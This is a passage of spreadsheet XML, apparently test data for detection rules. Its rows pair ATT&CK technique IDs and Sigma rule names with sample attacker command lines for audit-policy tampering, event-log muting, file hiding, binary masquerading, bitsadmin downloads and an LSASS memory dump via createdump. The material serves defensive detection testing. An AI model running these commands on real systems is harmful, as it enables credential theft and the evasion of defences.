        <v>3</v>
      </c>
      <c r="K2134" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2135" ht="15.75" customHeight="1" s="42">
      <c r="A2135" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2135" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_remotefxvgpudisablement_abuse</t>
        </is>
      </c>
      <c r="C2135" s="43" t="inlineStr">
        <is>
          <t>RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses</t>
        </is>
      </c>
      <c r="D2135" s="43" t="inlineStr">
        <is>
          <t>a6fc3c46-23b8-4996-9ea2-573f4c4d88c5</t>
        </is>
      </c>
      <c r="E2135" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Invoke-ATHRemoteFXvGPUDisableme -ModuleName foo -ModulePath $PWD}</t>
        </is>
      </c>
      <c r="F2135" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2135" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2135" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2135" s="43" t="n"/>
      <c r="J2135" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2135" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2136" ht="15.75" customHeight="1" s="42">
      <c r="A2136" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2136" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_remotefxvgpudisablement_abuse</t>
        </is>
      </c>
      <c r="C2136" s="43" t="inlineStr">
        <is>
          <t>RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses</t>
        </is>
      </c>
      <c r="D2136" s="43" t="inlineStr">
        <is>
          <t>a6fc3c46-23b8-4996-9ea2-573f4c4d88c5</t>
        </is>
      </c>
      <c r="E2136" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Invoke-ATHRemoteFXvGPUDisablementCommand -Module foo -ModulePath $PWD}</t>
        </is>
      </c>
      <c r="F2136" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2136" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2136" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2136" s="43" t="n"/>
      <c r="J2136" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2136" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2137" ht="15.75" customHeight="1" s="42">
      <c r="A2137" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2137" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_remotefxvgpudisablement_abuse</t>
        </is>
      </c>
      <c r="C2137" s="43" t="inlineStr">
        <is>
          <t>RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses</t>
        </is>
      </c>
      <c r="D2137" s="43" t="inlineStr">
        <is>
          <t>a6fc3c46-23b8-4996-9ea2-573f4c4d88c5</t>
        </is>
      </c>
      <c r="E2137" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName foo -ModulePath $env:PWD}</t>
        </is>
      </c>
      <c r="F2137" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2137" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2137" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2137" s="43" t="n"/>
      <c r="J2137" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2137" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2138" ht="15.75" customHeight="1" s="42">
      <c r="A2138" s="43" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B2138" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_node_abuse</t>
        </is>
      </c>
      <c r="C2138" s="43" t="inlineStr">
        <is>
          <t>Potential Arbitrary Code Execution Via Node.EXE</t>
        </is>
      </c>
      <c r="D2138" s="43" t="inlineStr">
        <is>
          <t>6640f31c-01ad-49b5-beb5-83498a5cd8bd</t>
        </is>
      </c>
      <c r="E2138" s="43" t="inlineStr">
        <is>
          <t>node.exe -e "require('child_process').exec('cmd /c echo test &gt; C:\\Windows\\Temp\\test.txt');"</t>
        </is>
      </c>
      <c r="F2138" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2138" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2138" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2138" s="43" t="n"/>
      <c r="J2138" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2138" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2139" ht="15.75" customHeight="1" s="42">
      <c r="A2139" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2139" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_hiding_files</t>
        </is>
      </c>
      <c r="C2139" s="43" t="inlineStr">
        <is>
          <t>Hiding Files with Attrib.exe</t>
        </is>
      </c>
      <c r="D2139" s="43" t="inlineStr">
        <is>
          <t>4281cb20-2994-4580-aa63-c8b86d019934</t>
        </is>
      </c>
      <c r="E2139" s="43" t="inlineStr">
        <is>
          <t>attrib.exe +h C:\Users\thaim\AppData\Local\Temp\T1222.001_attrib_2\T1222.001_attrib1.txt</t>
        </is>
      </c>
      <c r="F2139" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2139" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2139" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2139" s="43" t="n"/>
      <c r="J2139" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2139" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2140" ht="15.75" customHeight="1" s="42">
      <c r="A2140" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2140" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_hiding_files</t>
        </is>
      </c>
      <c r="C2140" s="43" t="inlineStr">
        <is>
          <t>Hiding Files with Attrib.exe</t>
        </is>
      </c>
      <c r="D2140" s="43" t="inlineStr">
        <is>
          <t>4281cb20-2994-4580-aa63-c8b86d019934</t>
        </is>
      </c>
      <c r="E2140" s="43" t="inlineStr">
        <is>
          <t>attrib.exe +h C:\Users\thaim\AppData\Local\Temp\T1222.001_attrib_2\T1222.001_attrib1.txt C:\Users\thaim\AppData\Local\Temp\T1222.001_attrib_2\T1222.001_attrib2.txt</t>
        </is>
      </c>
      <c r="F2140" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2140" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2140" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2140" s="43" t="n"/>
      <c r="J2140" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2140" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2141" ht="15.75" customHeight="1" s="42">
      <c r="A2141" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2141" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_system_susp_paths</t>
        </is>
      </c>
      <c r="C2141" s="43" t="inlineStr">
        <is>
          <t>Set Suspicious Files as System Files Using Attrib.EXE</t>
        </is>
      </c>
      <c r="D2141" s="43" t="inlineStr">
        <is>
          <t>efec536f-72e8-4656-8960-5e85d091345b</t>
        </is>
      </c>
      <c r="E2141" s="43" t="inlineStr">
        <is>
          <t>attrib.exe +s C:\Users\Public\malicious.txt</t>
        </is>
      </c>
      <c r="F2141" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2141" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2141" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2141" s="43" t="n"/>
      <c r="J2141" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2141" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2142" ht="15.75" customHeight="1" s="42">
      <c r="A2142" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2142" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_system_susp_paths</t>
        </is>
      </c>
      <c r="C2142" s="43" t="inlineStr">
        <is>
          <t>Set Suspicious Files as System Files Using Attrib.EXE</t>
        </is>
      </c>
      <c r="D2142" s="43" t="inlineStr">
        <is>
          <t>efec536f-72e8-4656-8960-5e85d091345b</t>
        </is>
      </c>
      <c r="E2142" s="43" t="inlineStr">
        <is>
          <t>attrib.exe +sh C:\Users\AppData\Local\malicious.txt</t>
        </is>
      </c>
      <c r="F2142" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2142" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2142" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2142" s="43" t="n"/>
      <c r="J2142" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2142" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2143" ht="15.75" customHeight="1" s="42">
      <c r="A2143" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2143" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_system_susp_paths</t>
        </is>
      </c>
      <c r="C2143" s="43" t="inlineStr">
        <is>
          <t>Set Suspicious Files as System Files Using Attrib.EXE</t>
        </is>
      </c>
      <c r="D2143" s="43" t="inlineStr">
        <is>
          <t>efec536f-72e8-4656-8960-5e85d091345b</t>
        </is>
      </c>
      <c r="E2143" s="43" t="inlineStr">
        <is>
          <t>copy attrib.exe not_attrib.exe &amp;&amp; not_attrib.exe +s C:\Users\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F2143" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2143" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2143" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2143" s="43" t="n"/>
      <c r="J2143" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2143" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2144" ht="15.75" customHeight="1" s="42">
      <c r="A2144" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2144" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_icacls_deny</t>
        </is>
      </c>
      <c r="C2144" s="43" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone</t>
        </is>
      </c>
      <c r="D2144" s="43" t="inlineStr">
        <is>
          <t>4ae81040-fc1c-4249-bfa3-938d260214d9</t>
        </is>
      </c>
      <c r="E2144" s="43" t="inlineStr">
        <is>
          <t>icacls.exe "C:\\Users\\Public\\secret" /deny *S-1-1-0:(OI)(CI)(DE,DC) &gt;NUL 2&gt;&amp;1</t>
        </is>
      </c>
      <c r="F2144" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2144" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2144" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2144" s="43" t="n"/>
      <c r="J2144" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2144" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2145" ht="15.75" customHeight="1" s="42">
      <c r="A2145" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B2145" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_auditpol_nt_resource_kit_usage</t>
        </is>
      </c>
      <c r="C2145" s="43" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via NT Resource Kit Auditpol</t>
        </is>
      </c>
      <c r="D2145" s="43" t="inlineStr">
        <is>
          <t>c6c56ada-612b-42d1-9a29-adad3c5c2c1e</t>
        </is>
      </c>
      <c r="E2145" s="43" t="inlineStr">
        <is>
          <t>auditpol.exe /set /subcategory:"Logon" /success:disable /failure:disable</t>
        </is>
      </c>
      <c r="F2145" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2145" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2145" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2145" s="43" t="n"/>
      <c r="J2145" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2145" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2146" ht="15.75" customHeight="1" s="42">
      <c r="A2146" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B2146" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_auditpol_nt_resource_kit_usage</t>
        </is>
      </c>
      <c r="C2146" s="43" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via NT Resource Kit Auditpol</t>
        </is>
      </c>
      <c r="D2146" s="43" t="inlineStr">
        <is>
          <t>c6c56ada-612b-42d1-9a29-adad3c5c2c1e</t>
        </is>
      </c>
      <c r="E2146" s="43" t="inlineStr">
        <is>
          <t>auditpol.exe /remove /all</t>
        </is>
      </c>
      <c r="F2146" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2146" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2146" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2146" s="43" t="n"/>
      <c r="J2146" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2146" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2147" ht="15.75" customHeight="1" s="42">
      <c r="A2147" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B2147" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_auditpol_susp_execution</t>
        </is>
      </c>
      <c r="C2147" s="43" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via Auditpol</t>
        </is>
      </c>
      <c r="D2147" s="43" t="inlineStr">
        <is>
          <t>0a13e132-651d-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E2147" s="43" t="inlineStr">
        <is>
          <t>auditpol.exe /set /category:Detailed_Tracking /success:disable</t>
        </is>
      </c>
      <c r="F2147" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2147" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2147" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2147" s="43" t="n"/>
      <c r="J2147" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2147" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2148" ht="15.75" customHeight="1" s="42">
      <c r="A2148" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B2148" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpevtmute</t>
        </is>
      </c>
      <c r="C2148" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpEvtMute Execution</t>
        </is>
      </c>
      <c r="D2148" s="43" t="inlineStr">
        <is>
          <t>bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c</t>
        </is>
      </c>
      <c r="E2148" s="43" t="inlineStr">
        <is>
          <t>SharpEvtMute.exe --Filter 'rule name { eventid == 4624 }'</t>
        </is>
      </c>
      <c r="F2148" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2148" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2148" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2148" s="43" t="n"/>
      <c r="J2148" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2148" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2149" ht="15.75" customHeight="1" s="42">
      <c r="A2149" s="43" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B2149" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bash_command_execution</t>
        </is>
      </c>
      <c r="C2149" s="43" t="inlineStr">
        <is>
          <t>Indirect Inline Command Execution Via Bash.EXE</t>
        </is>
      </c>
      <c r="D2149" s="43" t="inlineStr">
        <is>
          <t>5edc2273-c26f-406c-83f3-f4d948e740dd</t>
        </is>
      </c>
      <c r="E2149" s="43" t="inlineStr">
        <is>
          <t>bash.exe -c "whoami"</t>
        </is>
      </c>
      <c r="F2149" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2149" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2149" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2149" s="43" t="n"/>
      <c r="J2149" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2149" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2150" ht="15.75" customHeight="1" s="42">
      <c r="A2150" s="43" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B2150" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bash_command_execution</t>
        </is>
      </c>
      <c r="C2150" s="43" t="inlineStr">
        <is>
          <t>Indirect Inline Command Execution Via Bash.EXE</t>
        </is>
      </c>
      <c r="D2150" s="43" t="inlineStr">
        <is>
          <t>5edc2273-c26f-406c-83f3-f4d948e740dd</t>
        </is>
      </c>
      <c r="E2150" s="43" t="inlineStr">
        <is>
          <t>bash.exe -c whoami</t>
        </is>
      </c>
      <c r="F2150" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2150" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2150" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2150" s="43" t="n"/>
      <c r="J2150" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2150" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2151" ht="15.75" customHeight="1" s="42">
      <c r="A2151" s="43" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B2151" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bash_command_execution</t>
        </is>
      </c>
      <c r="C2151" s="43" t="inlineStr">
        <is>
          <t>Indirect Inline Command Execution Via Bash.EXE</t>
        </is>
      </c>
      <c r="D2151" s="43" t="inlineStr">
        <is>
          <t>5edc2273-c26f-406c-83f3-f4d948e740dd</t>
        </is>
      </c>
      <c r="E2151" s="43" t="inlineStr">
        <is>
          <t>bash.exe -c"whoami"</t>
        </is>
      </c>
      <c r="F2151" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2151" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2151" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2151" s="43" t="n"/>
      <c r="J2151" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2151" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2152" ht="15.75" customHeight="1" s="42">
      <c r="A2152" s="43" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B2152" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_legacy_option</t>
        </is>
      </c>
      <c r="C2152" s="43" t="inlineStr">
        <is>
          <t>Suspicious High IntegrityLevel Conhost Legacy Option</t>
        </is>
      </c>
      <c r="D2152" s="43" t="inlineStr">
        <is>
          <t>3037d961-21e9-4732-b27a-637bcc7bf539</t>
        </is>
      </c>
      <c r="E2152" s="43" t="inlineStr">
        <is>
          <t>conhost.exe 0xffffffff -ForceV1</t>
        </is>
      </c>
      <c r="F2152" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2152" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2152" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2152" s="43" t="n"/>
      <c r="J2152" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2152" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2153" ht="15.75" customHeight="1" s="42">
      <c r="A2153" s="43" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B2153" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_legacy_option</t>
        </is>
      </c>
      <c r="C2153" s="43" t="inlineStr">
        <is>
          <t>Suspicious High IntegrityLevel Conhost Legacy Option</t>
        </is>
      </c>
      <c r="D2153" s="43" t="inlineStr">
        <is>
          <t>3037d961-21e9-4732-b27a-637bcc7bf539</t>
        </is>
      </c>
      <c r="E2153" s="43" t="inlineStr">
        <is>
          <t>"conhost.exe" 0xffffffff -ForceV1</t>
        </is>
      </c>
      <c r="F2153" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2153" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2153" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2153" s="43" t="n"/>
      <c r="J2153" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2153" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2154" ht="15.75" customHeight="1" s="42">
      <c r="A2154" s="43" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B2154" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_legacy_option</t>
        </is>
      </c>
      <c r="C2154" s="43" t="inlineStr">
        <is>
          <t>Suspicious High IntegrityLevel Conhost Legacy Option</t>
        </is>
      </c>
      <c r="D2154" s="43" t="inlineStr">
        <is>
          <t>3037d961-21e9-4732-b27a-637bcc7bf539</t>
        </is>
      </c>
      <c r="E2154" s="43" t="inlineStr">
        <is>
          <t>conhost.exe 0xFFFFFFFF -forcev1</t>
        </is>
      </c>
      <c r="F2154" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2154" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2154" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2154" s="43" t="n"/>
      <c r="J2154" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2154" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2155" ht="15.75" customHeight="1" s="42">
      <c r="A2155" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2155" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download</t>
        </is>
      </c>
      <c r="C2155" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin</t>
        </is>
      </c>
      <c r="D2155" s="43" t="inlineStr">
        <is>
          <t>d059842b-6b9d-4ed1-b5c3-5b89143c6ede</t>
        </is>
      </c>
      <c r="E2155" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\bitsadmin.exe" /transfer MyJob /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt C:\Users\thaim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F2155" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2155" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2155" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2155" s="43" t="n"/>
      <c r="J2155" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2155" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2156" ht="15.75" customHeight="1" s="42">
      <c r="A2156" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2156" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C2156" s="43" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D2156" s="43" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E2156" s="43" t="inlineStr">
        <is>
          <t>copy calc.exe math.exe &amp;&amp; math.exe -suspicious_flag</t>
        </is>
      </c>
      <c r="F2156" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2156" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2156" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2156" s="43" t="n"/>
      <c r="J2156" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2156" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2157" ht="15.75" customHeight="1" s="42">
      <c r="A2157" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2157" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C2157" s="43" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D2157" s="43" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E2157" s="43" t="inlineStr">
        <is>
          <t>calc.exe</t>
        </is>
      </c>
      <c r="F2157" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2157" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2157" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2157" s="43" t="n"/>
      <c r="J2157" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2157" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2158" ht="15.75" customHeight="1" s="42">
      <c r="A2158" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2158" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C2158" s="43" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D2158" s="43" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E2158" s="43" t="inlineStr">
        <is>
          <t>calc.exe -?</t>
        </is>
      </c>
      <c r="F2158" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2158" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2158" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2158" s="43" t="n"/>
      <c r="J2158" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2158" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2159" ht="15.75" customHeight="1" s="42">
      <c r="A2159" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2159" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_switch</t>
        </is>
      </c>
      <c r="C2159" s="43" t="inlineStr">
        <is>
          <t>Suspicious CodePage Switch Via CHCP</t>
        </is>
      </c>
      <c r="D2159" s="43" t="inlineStr">
        <is>
          <t>c7942406-33dd-4377-a564-0f62db0593a3</t>
        </is>
      </c>
      <c r="E2159" s="43" t="inlineStr">
        <is>
          <t>chcp.com 936</t>
        </is>
      </c>
      <c r="F2159" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2159" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2159" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2159" s="43" t="n"/>
      <c r="J2159" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2159" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2160" ht="15.75" customHeight="1" s="42">
      <c r="A2160" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2160" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C2160" s="43" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D2160" s="43" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E2160" s="43" t="inlineStr">
        <is>
          <t>"C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\5.0.17\\createdump.exe" --full -f C:\\Users\\thaim\\AppData\\Local\\Temp\\dotnet-lsass.dmp 788</t>
        </is>
      </c>
      <c r="F2160" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2160" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2160" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2160" s="43" t="n"/>
      <c r="J2160" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2160" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2161" ht="15.75" customHeight="1" s="42">
      <c r="A2161" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2161" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C2161" s="43" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D2161" s="43" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E2161" s="43" t="inlineStr">
        <is>
          <t>"C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\5.0.17\\createdump.exe" --full --name C:\\Users\\thaim\\AppData\\Local\\Temp\\dotnet-lsass.dmp 788</t>
        </is>
      </c>
      <c r="F2161" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2161" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2161" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2161" s="43" t="n"/>
      <c r="J2161" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2161" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2162" ht="15.75" customHeight="1" s="42">
      <c r="A2162" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2162" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_execution</t>
        </is>
      </c>
      <c r="C2162" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D2162" s="43" t="inlineStr">
        <is>
